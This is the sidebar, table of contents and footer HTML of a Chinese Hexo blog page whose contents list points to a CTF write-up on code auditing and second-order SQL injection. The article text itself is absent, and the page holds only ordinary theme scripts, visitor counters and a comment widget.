        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  
    <img class="site-author-image" itemprop="image" src="/images/tx5.gif" alt="Fany">
  
  <p class="site-author-name" itemprop="name">Fany</p>
  <div class="site-description motion-element" itemprop="description">千里之行，始于足下。</div>
</div>


  <nav class="site-state motion-element">
    
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">47</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">42</span>
        <span class="site-state-item-name">标签</span>
        </a>
      </div>
    
  </nav>







  <div class="links-of-author motion-element">
    
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="https://github.com/fanygit" title="GitHub &rarr; https://github.com/fanygit" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
    
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="mailto:483813121@qq.com" title="E-Mail &rarr; mailto:483813121@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
    
  </div>



  <div class="cc-license motion-element" itemprop="license">
  
  
    
  
  
  
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>




  <div class="links-of-blogroll motion-element links-of-blogroll-block">
    <div class="links-of-blogroll-title">
      <i class="fa  fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
      
        <li class="links-of-blogroll-item">
          <a href="https://leancloud.cn/dashboard/applist.html#/apps" title="https://leancloud.cn/dashboard/applist.html#/apps" rel="noopener" target="_blank">Leancloud</a>
        </li>
      
    </ul>
  </div>


          
          
        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#考点"><span class="nav-number">1.</span> <span class="nav-text">考点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题过程"><span class="nav-number">2.</span> <span class="nav-text">解题过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#代码审计"><span class="nav-number">2.1.</span> <span class="nav-text">代码审计</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#二次注入"><span class="nav-number">2.2.</span> <span class="nav-text">二次注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Fany</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.2.0</div>




<!-- 网站运行时间的设置 -->
<span id="timeDate">载入天数...</span>
<span id="times">载入时分秒...</span>  Sometimes your whole life boils down to one insame move.
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("07/28/2019 00:00:00");//此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
        document.getElementById("timeDate").innerHTML = "本站已安全运行 "+dnum+" 天 ";
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
    }
setInterval("createtime()",250);
</script>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    

  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
















  
  









  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>




  <script src="/js/utils.js?v=7.2.0"></script>

  <script src="/js/motion.js?v=7.2.0"></script>



  
  


  <script src="/js/affix.js?v=7.2.0"></script>

  <script src="/js/schemes/pisces.js?v=7.2.0"></script>



  
  <script src="/js/scrollspy.js?v=7.2.0"></script>
<script src="/js/post-details.js?v=7.2.0"></script>



  <script src="/js/next-boot.js?v=7.2.0"></script>

  

  

  


  













  <script src="/js/local-search.js?v=7.2.0"></script>



















  
    

<script src="//unpkg.com/valine/dist/Valine.min.js"></script>

<script>
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: 'pbe8vhO6luYrD6pclzm8NQST-gzGzoHsz',
    appKey: 'sKqLiA3nL8BojxzmOL3HCdGO',
    placeholder: '非常希望您能留下宝贵的意见！',
    avatar: 'mm',
    meta: guest,
    pageSize: '10' || 10,
    visitor: false,
    lang: '' || 'zh-cn'
  });
</script>

  
<!--   <link rel="stylesheet" href="https://github.com/fanygit/dist/raw/master/APlayer.min.css">
<div id="aplayer"></div>
<script type="text/javascript" src="https://github.com/fanygit/dist/raw/master/APlayer.min.js"></script>
<script type="text/javascript" src="https://raw.githubusercontent.com/fanygit/dist/master/music.js"></script> -->
</body>
</html>
